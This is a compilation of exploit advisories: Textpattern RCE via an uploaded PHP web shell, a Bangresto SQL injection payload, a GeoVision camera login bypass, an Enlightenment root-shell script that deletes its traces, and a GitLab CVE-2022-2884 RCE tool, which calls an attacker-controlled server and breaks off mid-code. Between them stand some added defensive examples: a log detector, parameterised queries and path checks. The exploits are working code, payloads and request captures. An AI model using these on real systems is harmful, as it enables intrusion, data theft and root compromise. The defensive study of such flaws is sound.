# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/TW)
# Software Homepage: https://textpattern.com/
# Version : 4.8.8
# Tested on: Windows 11 XAMPP | Kali Linux
# Category: WebApp
# Google Dork: intext:"Published with Textpattern CMS"
# Date: 10/09/2022
#
######## Description ########
#
# Step 1: Log in to the admin account and go to the site settings
# Step 2: Upload a file to the web site and select rce.php
# Step 3: Upload your webshell, that's it...
#
######## Proof of Concept ########
========>>> START REQUEST <<<=========
############# POST REQUEST (FILE UPLOAD) ############################## (1)
POST /textpattern/index.php?event=file HTTP/1.1
Host: localhost
Content-Length: 1038
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/textpattern/index.php?event=file
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin
Connection: close
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="fileInputOrder"
1/1
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="app_mode"
async
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2000000
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="event"
file
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="step"
file_insert
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="_txp_token"
16ea3b64ca6379aee9599586dae73a5d
------WebKitFormBoundaryMgUEFltFdqBVvdJu
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundaryMgUEFltFdqBVvdJu--
############ POST RESPONSE (FILE UPLOAD) ######### (1)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:28:57 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Textpattern-Runtime: 35.38 ms
X-Textpattern-Querytime: 9.55 ms
X-Textpattern-Queries: 16
X-Textpattern-Memory: 2893 kB
Content-Length: 270
Connection: close
Content-Type: text/javascript; charset=utf-8
___________________________________________________________________________________________________________________________________________________
############ REQUEST TO THE PAYLOAD ############################### (2)
GET /files/c.php?cmd=whoami HTTP/1.1
Host: localhost
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: txp_login_public=4353608be0admin
Connection: close
############ RESPONSE THE PAYLOAD ############################### (2)
HTTP/1.1 200 OK
Date: Sat, 10 Sep 2022 15:33:06 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
Content-Length: 29
Connection: close
Content-Type: text/html; charset=UTF-8
<pre>alpernae\alperen
</pre>
========>>> END REQUEST <<<=========
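The two requests above show the pattern a defender can look for in web server logs: an admin-side upload (`index.php?event=file`) followed by a request that executes a script out of Textpattern's `/files/` download directory. The following detector is an added example, not part of the advisory; the log lines are constructed in Apache combined format and the `/files/` prefix is assumed to be the site's file-download path.

```python
# Added example (not from the advisory): flag requests that execute server-side
# scripts out of Textpattern's /files/ download directory, plus the admin-side
# upload step that precedes them, from combined-format access log lines.
import re
from urllib.parse import urlsplit, parse_qs

# Combined log format; client IP, timestamp, method, target and status are what we need.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+'
)

# Extensions the web server must never execute from a download directory.
SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")
FILES_DIR = "/files/"   # assumed download directory, as in the advisory's second request


def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def is_script_under_files(path):
    return path.startswith(FILES_DIR) and path.lower().endswith(SCRIPT_EXTS)


def is_file_insert(rec):
    # Textpattern's file upload, as seen in the advisory's request:
    # POST index.php?event=file with step=file_insert in the multipart body.
    # The body is not in the access log, so the event parameter is the signal.
    return (rec["method"] == "POST"
            and rec["path"].endswith("/index.php")
            and rec["query"].get("event") == ["file"])


def detect(lines):
    """Return (alerts, uploads): alerts for script hits under /files/,
    uploads for the admin-side upload step (client IP, timestamp)."""
    alerts, uploads = [], []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_file_insert(rec):
            uploads.append((rec["ip"], rec["ts"]))
        if is_script_under_files(rec["path"]):
            alerts.append({
                "ip": rec["ip"], "path": rec["path"], "status": rec["status"],
                "params": sorted(rec["query"]),
                # A 200 means the script ran rather than being served as a download.
                "executed": rec["status"] == 200,
            })
    return alerts, uploads


# Constructed sample log lines modelled on the advisory's two requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2022:15:28:57 +0000] "POST /textpattern/index.php?event=file HTTP/1.1" 200 270',
    '203.0.113.5 - - [10/Sep/2022:15:33:06 +0000] "GET /files/c.php?cmd=whoami HTTP/1.1" 200 29',
    '198.51.100.7 - - [10/Sep/2022:15:40:00 +0000] "GET /files/report.pdf HTTP/1.1" 200 8812',
    '198.51.100.7 - - [10/Sep/2022:15:41:00 +0000] "GET /files/shell.PHP HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    found, ups = detect(SAMPLE_LOG)
    for a in found:
        print("script request under /files/:", a)
    for u in ups:
        print("file upload step by", u)
```

An alert whose client IP matches a recent upload entry is the strongest signal; a 403 on the same path shows the web server refusing to execute scripts from that directory, which is the mitigation to aim for.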
## Exploit Title: Bangresto 1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 12.16.2022
## Vendor: https://axcora.com/, https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html
## Demo: https://axcora.my.id/bangrestoapp/start.php
## Software: https://github.com/mesinkasir/bangresto
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto
## Description:
The `itemID` parameter appears to be vulnerable to SQL injection attacks.
The payload ' was submitted in the itemID parameter, and a database
error message was returned.
The attacker can steal all information from the database of this
application.
## STATUS: CRITICAL Vulnerability
[+] Payload:
```MySQL
---
Parameter: itemID (GET)
Type: error-based
Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
Payload: itemID=(UPDATEXML(2539,CONCAT(0x2e,0x7171767871,(SELECT
(ELT(2539=2539,1))),0x7170706a71),2327))&menuID=1
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Bangresto)
## Proof and Exploit:
[href](https://streamable.com/moapnd)
## Time spent
`00:30:00`
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/ https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
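The error-based finding above means the `itemID` value is spliced into the SQL text, so a single quote changes the statement instead of being compared as data. The following is an added example, not the Bangresto code: the same `itemID`/`menuID` lookup written both ways against an in-memory SQLite stand-in (the application uses MySQL; the table and rows are constructed).

```python
# Added example (not from the advisory): the itemID/menuID lookup written two
# ways, against an in-memory SQLite stand-in for the application's MySQL database.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE menu_item (itemID INTEGER, menuID INTEGER, name TEXT, price REAL)")
    conn.executemany("INSERT INTO menu_item VALUES (?, ?, ?, ?)", [
        (1, 1, "nasi goreng", 3.5),   # constructed rows
        (2, 1, "es teh", 1.0),
    ])
    return conn


def lookup_vulnerable(conn, item_id, menu_id):
    # Request parameters spliced straight into the statement, which is what the
    # error-based finding implies: a quote in itemID changes the SQL, not the value.
    sql = f"SELECT name, price FROM menu_item WHERE itemID = '{item_id}' AND menuID = '{menu_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, item_id, menu_id):
    # Placeholders keep user input as data; a quote is just a character in the value.
    sql = "SELECT name, price FROM menu_item WHERE itemID = ? AND menuID = ?"
    return conn.execute(sql, (item_id, menu_id)).fetchall()


def classify(conn, item_id, menu_id):
    """Run one input through both variants and report ('rows', result) or
    ('error', exception name). A database error reaching the caller is exactly
    the signal an error-based test looks for."""
    out = {}
    for name, fn in (("vulnerable", lookup_vulnerable), ("safe", lookup_safe)):
        try:
            out[name] = ("rows", fn(conn, item_id, menu_id))
        except sqlite3.Error as e:
            out[name] = ("error", type(e).__name__)
    return out


if __name__ == "__main__":
    db = make_db()
    print("itemID=1 :", classify(db, "1", "1"))
    print("itemID=' :", classify(db, "'", "1"))
```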
# Exploit Title: GeoVision Camera GV-ADR2701 - Authentication Bypass
# Device name: GV-ADR2701
# Date: 26 December , 2020
# Exploit Author: Chan Nyein Wai
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Firmware Version: V1.00_2017_12_15
# Tested on: windows 10
# Exploitation
1. Capture the login request with Burp, with intercept set to catch the response to that request.
Request:
```
PUT /LAPI/V1.0/Channel/0/System/Login HTTP/1.1
Host: 10.10.10.10
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0)
Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Authorization: Basic dW5kZWZpbmVkOnVuZGVmaW5lZA==
Content-Length: 46
Origin: http://10.10.10.10
Connection: close
Referer: http://10.10.10.10/index.htm?clientIpAddr=182.168.10.10&IsRemote=0
Cookie: isAutoStartVideo=1
{"UserName":"admin","Password":"0X]&0D]]05"}
```
2. The following is the normal response when you log in to the server.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 460,
"StatusString": "PasswdError",
"Data": "null"
}
}
```
By editing the response to the following, you can successfully log in to
the web application.
```
HTTP/1.1 200 Ok
Content-Length: 170
Content-Type: text/plain
Connection: close
X-Frame-Options: SAMEORIGIN
{
"Response": {
"ResponseURL": "/LAPI/V1.0/Channel/0/System/Login",
"CreatedID": -1,
"StatusCode": 0,
"StatusString": "Succeed",
"Data": "null"
}
}
```
## Exploit Title: Enlightenment v0.25.3 - Privilege escalation
## Author: nu11secur1ty
## Date: 12.26.2022
## Vendor: https://www.enlightenment.org/
## Software: https://www.enlightenment.org/download
## Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706
## CVE ID: CVE-2022-37706
## Description:
Enlightenment version 0.25.3 is vulnerable to local privilege escalation.
enlightenment_sys in Enlightenment before 0.25.3 allows local users to
gain privileges because it is setuid root,
and the system library function mishandles pathnames that begin with a
/dev/.. substring.
If the attacker has local access to some machine on which
Enlightenment is installed,
he can use this vulnerability to do very dangerous stuff.
## STATUS: CRITICAL Vulnerability
## Tested on:
```bash
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=22.10
DISTRIB_CODENAME=kinetic
DISTRIB_DESCRIPTION="Ubuntu 22.10"
PRETTY_NAME="Ubuntu 22.10"
NAME="Ubuntu"
VERSION_ID="22.10"
VERSION="22.10 (Kinetic Kudu)"
VERSION_CODENAME=kinetic
ID=ubuntu
ID_LIKE=debian
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
UBUNTU_CODENAME=kinetic
LOGO=ubuntu-logo
```
[+] Exploit:
```bash
#!/usr/bin/bash
# Idea by MaherAzzouz
# Development by nu11secur1ty
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
# The actual problem
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Welcome to the rabbit hole :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net
read -p "Press any key to clean the evidence..."
echo -e "Please wait... "
sleep 5
rm -rf /tmp/exploit
rm -rf /tmp/net
echo -e "Done; Everything is clear ;)"
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2022-37706)
## Proof and Exploit:
[href](https://streamable.com/zflbgg)
## Time spent
`01:00:00`
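The description above comes down to two defects in a setuid helper: a pathname check that only looks at the literal `/dev/` prefix, so `/dev/../tmp/...` passes, and a command line assembled from that string, so the `;` in the path is interpreted by the shell. The following is an added example modelled on that description, not enlightenment_sys's own code: the weak prefix test beside a check that canonicalises the path first and refuses shell metacharacters, and a mount invocation built as an argv list rather than a shell string.

```python
# Added example (not from the advisory): the pathname check that CVE-2022-37706
# describes as defeated by a "/dev/.." prefix, modelled in Python. Both checks
# are this example's own, not the code of enlightenment_sys.
import os
import re

DEVICE_ROOT = "/dev"        # devices the helper may mount
MOUNT_POINT_ROOT = "/tmp"   # assumed: where mount points are allowed to live
# Characters that let a path break out of a command line built by string
# concatenation (the advisory's crafted path carries a ';').
SHELL_META = re.compile(r"[;&|`$<>\s'\"\\()]")


def weak_device_check(path):
    # Literal prefix test: accepts "/dev/../tmp/..." because the string starts with "/dev/".
    return path.startswith(DEVICE_ROOT + "/")


def hardened_device_check(path):
    """Canonicalise first, compare on path components, then refuse anything a
    shell could interpret."""
    if not os.path.isabs(path) or "\0" in path:
        return False
    canonical = os.path.realpath(os.path.normpath(path))  # collapses '..' and '//', follows symlinks
    dev_root = os.path.realpath(DEVICE_ROOT)
    inside = canonical == dev_root or canonical.startswith(dev_root + os.sep)
    return inside and SHELL_META.search(canonical) is None


def build_mount_argv(device, mount_point):
    """Return the mount command as an argv list (no shell involved), or None if refused."""
    if not hardened_device_check(device):
        return None
    mp = os.path.realpath(os.path.normpath(mount_point))
    mp_root = os.path.realpath(MOUNT_POINT_ROOT)
    if not mp.startswith(mp_root + os.sep):
        return None
    # Passing argv to execve-style APIs means ';' or spaces in arguments stay arguments.
    return ["/bin/mount", "-o", "noexec,nosuid,nodev", device, mp]


# The crafted device path from the advisory's script, and an ordinary device path.
CRAFTED = "/dev/../tmp/;/tmp/exploit"
PLAIN = "/dev/sdb1"

if __name__ == "__main__":
    for p in (CRAFTED, PLAIN):
        print(f"{p!r}: weak={weak_device_check(p)} hardened={hardened_device_check(p)}")
    print(build_mount_argv(PLAIN, "/tmp///net"))
```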
# Exploit Title: GitLab v15.3 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-12-25
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://about.gitlab.com/
# Software Link: https://about.gitlab.com/install/
# Version: GitLab CE/EE, all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3.1
# Tested on: 'gitlab/gitlab-ce:15.3.0-ce.0' Docker container (vulnerable application), 'Ubuntu 20.04.5 LTS' with 'Python 3.8.10' (script execution)
# CVE: CVE-2022-2884
# Category: WebApps
# Repository: https://github.com/m3ssap0/gitlab_rce_cve-2022-2884
# Credits: yvvdwf (https://hackerone.com/reports/1672388)
# This is a Python3 program that exploits GitLab authenticated RCE vulnerability known as CVE-2022-2884.
# A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3,
# 15.3 to 15.3.1 allows an authenticated user to achieve remote code execution
# via the Import from GitHub API endpoint.
# https://about.gitlab.com/releases/2022/08/22/critical-security-release-gitlab-15-3-1-released/
# DISCLAIMER: This tool is intended for security engineers and appsec people for security assessments.
# Please use this tool responsibly. I do not take responsibility for the way in which any one uses
# this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.
```python
import argparse
import logging
import validators
import random
import string
import requests
import time
import base64
import sys
from flask import Flask, current_app, request
from multiprocessing import Process

VERSION = "v1.0 (2022-12-25)"
DEFAULT_LOGGING_LEVEL = logging.INFO

app = Flask(__name__)


def parse_arguments():
    parser = argparse.ArgumentParser(
        description=f"Exploit for GitLab authenticated RCE vulnerability known as CVE-2022-2884. - {VERSION}"
    )
    parser.add_argument("-u", "--url",
                        required=True,
                        help="URL of the victim GitLab")
    parser.add_argument("-pt", "--private-token",
                        required=True,
                        help="private token of GitLab")
    parser.add_argument("-tn", "--target-namespace",
                        required=False,
                        default="root",
                        help="target namespace of GitLab (default is 'root')")
    parser.add_argument("-a", "--address",
                        required=True,
                        help="IP address of the attacker machine")
    parser.add_argument("-p", "--port",
                        required=False,
                        type=int,
                        default=1337,
                        help="TCP port of the attacker machine (default is 1337)")
    parser.add_argument("-s", "--https",
                        action="store_true",
                        required=False,
                        default=False,
                        help="set if the attacker machine is exposed via HTTPS")
    parser.add_argument("-c", "--command",
                        required=True,
                        help="the command to execute")
    parser.add_argument("-d", "--delay",
                        type=float,
                        required=False,
                        help="seconds of delay to wait for the exploit to complete")
    parser.add_argument("-v", "--verbose",
                        action="store_true",
                        required=False,
                        default=False,
                        help="verbose mode")
    return parser.parse_args()


def validate_input(args):
    # validators.url()/ipv4() return a falsy failure object instead of raising,
    # so the return value has to be tested directly.
    if not validators.url(args.url):
        raise ValueError("Invalid target URL!")
    if len(args.private_token.strip()) < 1 and not args.private_token.strip().startswith("glpat-"):
        raise ValueError("Invalid GitLab private token!")
    if len(args.target_namespace.strip()) < 1:
        raise ValueError("Invalid GitLab target namespace!")
    if not validators.ipv4(args.address):
        raise ValueError("Invalid attacker IP address!")
    if args.port < 1 or args.port > 65535:
        raise ValueError("Invalid attacker TCP port!")
    if len(args.command.strip()) < 1:
        raise ValueError("Invalid command!")
    if args.delay is not None and args.delay <= 0.0:
        raise ValueError("Invalid delay!")


def generate_random_string(length):
    letters = string.ascii_lowercase + string.ascii_uppercase + string.digits
    return ''.join(random.choice(letters) for i in range(length))


def generate_random_lowercase_string(length):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(length))


def generate_random_number(length):
    letters = string.digits
    result = "0"
    while result.startswith("0"):
        result = ''.join(random.choice(letters) for i in range(length))
    return result


def base64encode(to_encode):
    return base64.b64encode(to_encode.encode("ascii")).decode("ascii")


def send_request(url, private_token, target_namespace, address, port, is_https, fake_repo_id):
    logging.info("Sending request to target GitLab.")
    protocol = "http"
    if is_https:
        protocol += "s"
    headers = {
        "Content-Type": "application/json",
        "PRIVATE-TOKEN": private_token,
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
    }
    fake_personal_access_token = "ghp_" + generate_random_string(36)
    new_name = generate_random_lowercase_string(8)
    logging.debug("Random generated parameters of the request:")
    logging.debug(f"              fake_repo_id = {fake_repo_id}")
    logging.debug(f"fake_personal_access_token = {fake_personal_access_token}")
    logging.debug(f"                  new_name = {new_name}")
    payload = {
        "personal_access_token": fake_personal_access_token,
        "repo_id": fake_repo_id,
        "target_namespace": target_namespace,
        "new_name": new_name,
        "github_hostname": f"{protocol}://{address}:{port}"
    }
    target_endpoint = f"{url}"
    if not target_endpoint.endswith("/"):
        target_endpoint = f"{target_endpoint}/"
    target_endpoint = f"{target_endpoint}api/v4/import/github"
    try:
        r = requests.post(target_endpoint, headers=headers, json=payload)
        logging.debug("Response:")
        logging.debug(f"status_code = {r.status_code}")
        logging.debug(f"       text = {r.text}")
        logging.info(f"Request sent to target GitLab (HTTP {r.status_code}).")
        if r.status_code != 201:
            logging.fatal("Wrong response received from the target GitLab.")
            logging.debug(f"       text = {r.text}")
            raise Exception("Wrong response received from the target GitLab.")
    except:
        logging.fatal("Error in contacting the target GitLab.")
        raise Exception("Error in contacting the target GitLab.")


def is_server_alive(address, port, is_https):
    protocol = "http"
    if is_https:
        protocol += "s"
    try:
        r = requests.get(f"{protocol}://{address}:{port}/")
        if r.status_code == 200 and "The server is running." in r.text:
            return True
        else:
            return False
    except:
        return False


def start_fake_github_server(address, port, is_https, command, fake_repo_id):
    app.config["address"] = address
    app.config["port"] = port
    protocol = "http"
    if is_https:
        protocol += "s"
    app.config["attacker_server"] = f"{protocol}://{address}:{port}"
    app.config["command"] = command
    app.config["fake_user"] = generate_random_lowercase_string(8)
    app.config["fake_user_id"] = generate_random_number(8)
    app.config["fake_repo"] = generate_random_lowercase_string(8)
    app.config["fake_repo_id"] = fake_repo_id
    app.config["fake_issue_id"] = generate_random_number(9)
    app.run("0.0.0.0", port)


def encode_command(command):
    encoded_command = ""
    for c in command:
        encoded_command += ("<< " + str(ord(c)) + ".chr ")
    encoded_command += "<<"
    logging.debug(f"encoded_command = {encoded_command}")
    return encoded_command


def generate_rce_payload(command):
    logging.debug("Crafting RCE payload:")
    logging.debug(f"        command = {command}")
    encoded_command = encode_command(command)  # Useful in order to prevent escaping hell...
    rce_payload = f"lpush resque:gitlab:queue:system_hook_push \"{{\\\"class\\\":\\\"PagesWorker\\\",\\\"args\\\":[\\\"class_eval\\\",\\\"IO.read('| ' {encoded_command} ' ')\\\"], \\\"queue\\\":\\\"system_hook_push\\\"}}\""
    logging.debug(f"    rce_payload = {rce_payload}")
    return rce_payload


def generate_user_response(attacker_server, fake_user, fake_user_id):
    response = {
        "avatar_url": f"{attacker_server}/avatars/{fake_user_id}",
        "events_url": f"{attacker_server}/users/{fake_user}/events{{/privacy}}",
        "followers_url": f"{attacker_server}/users/{fake_user}/followers",
        "following_url": f"{attacker_server}/users/{fake_user}/following{{/other_user}}",
        "gists_url": f"{attacker_server}/users/{fake_user}/gists{{/gist_id}}",
        "gravatar_id": "",
        "html_url": f"{attacker_server}/{fake_user}",
        "id": int(fake_user_id),
        "login": f"{fake_user}",
        "node_id": base64encode(f"04:User{fake_user_id}"),
        "organizations_url": f"{attacker_server}/users/{fake_user}/orgs",
        "received_events_url": f"{attacker_server}/users/{fake_user}/received_events",
        "repos_url": f"{attacker_server}/users/{fake_user}/repos",
        "site_admin": False,
        "starred_url": f"{attacker_server}/users/{fake_user}/starred{{/owner}}{{/repo}}",
        "subscriptions_url": f"{attacker_server}/users/{fake_user}/subscriptions",
        "type": "User",
        "url": f"{attacker_server}/users/{fake_user}"
    }
    return response


def generate_user_full_response(attacker_server, fake_user, fake_user_id):
    partial = generate_user_response(attacker_server, fake_user, fake_user_id)
    others = {
        "bio": None,
        "blog": "",
        "company": None,
        "created_at": "2020-08-21T14:35:46Z",
        "email": None,
        "followers": 2,
        "following": 0,
        "hireable": None,
        "location": None,
        "name": None,
        "public_gists": 0,
        "public_repos": 0,
        "twitter_username": None,
        "updated_at": "2022-08-08T12:11:40Z",
    }
    response = {**partial, **others}
    return response


def generate_repo_response(address, port, attacker_server, fake_user, fake_user_id, fake_repo, repo_id):
    response = {
        "allow_auto_merge": False,
        "allow_forking": True,
        "allow_merge_commit": True,
        "allow_rebase_merge": True,
        "allow_squash_merge": True,
        "allow_update_branch": False,
        "archive_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/{{archive_format}}{{/ref}}",
        "archived": False,
        "assignees_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/assignees{{/user}}",
        "blobs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/blobs{{/sha}}",
        "branches_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/branches{{/branch}}",
        "clone_url": f"{attacker_server}/{fake_user}/{fake_repo}.git",
        "collaborators_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/collaborators{{/collaborator}}",
        "comments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/comments{{/number}}",
        "commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/commits{{/sha}}",
        "compare_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/compare/{{base}}...{{head}}",
        "contents_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contents/{{+path}}",
        "contributors_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/contributors",
        "created_at": "2021-04-09T13:55:55Z",
        "default_branch": "main",
        "delete_branch_on_merge": False,
        "deployments_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/deployments",
        "description": None,
        "disabled": False,
        "downloads_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/downloads",
        "events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/events",
        "fork": False,
        "forks": 1,
        "forks_count": 1,
        "forks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/forks",
        "full_name": f"{fake_user}/{fake_repo}",
        "git_commits_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/commits{{/sha}}",
        "git_refs_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/refs{{/sha}}",
        "git_tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/git/tags{{/sha}}",
        "git_url": f"git://{address}:{port}/{fake_user}/{fake_repo}.git",
        "has_downloads": True,
        "has_issues": True,
        "has_pages": False,
        "has_projects": True,
        "has_wiki": True,
        "homepage": None,
        "hooks_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/hooks",
        "html_url": f"{attacker_server}/{fake_user}/{fake_repo}",
        "id": int(repo_id),
        "is_template": False,
        "issue_comment_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/comments{{/number}}",
        "issue_events_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues/events{{/number}}",
        "issues_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/issues{{/number}}",
        "keys_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/keys{{/key_id}}",
        "labels_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/labels{{/name}}",
        "language": "Python",
        "languages_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/languages",
        "license": None,
        "merge_commit_message": "Message",
        "merge_commit_title": "Title",
        "merges_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/merges",
        "milestones_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/milestones{{/number}}",
        "mirror_url": None,
        "name": f"{fake_repo}",
        "network_count": 1,
        "node_id": base64encode(f"010:Repository{repo_id}"),
        "notifications_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/notifications{{?since,all,participating}}",
        "open_issues": 4,
        "open_issues_count": 4,
        "owner": generate_user_response(attacker_server, fake_user, fake_user_id),
        "permissions": {
            "admin": True,
            "maintain": True,
            "pull": True,
            "push": True,
            "triage": True
        },
        "private": True,
        "pulls_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/pulls{{/number}}",
        "pushed_at": "2022-08-14T15:36:21Z",
        "releases_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/releases{{/id}}",
        "size": 3802,
        "squash_merge_commit_message": "Message",
        "squash_merge_commit_title": "Title",
        "ssh_url": f"git@{address}:{fake_user}/{fake_repo}.git",
        "stargazers_count": 0,
        "stargazers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/stargazers",
        "statuses_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/statuses/{{sha}}",
        "subscribers_count": 1,
        "subscribers_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscribers",
        "subscription_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/subscription",
        "svn_url": f"{attacker_server}/{fake_user}/{fake_repo}",
        "tags_url": f"{attacker_server}/repos/{fake_user}/{fake_repo}/tags",
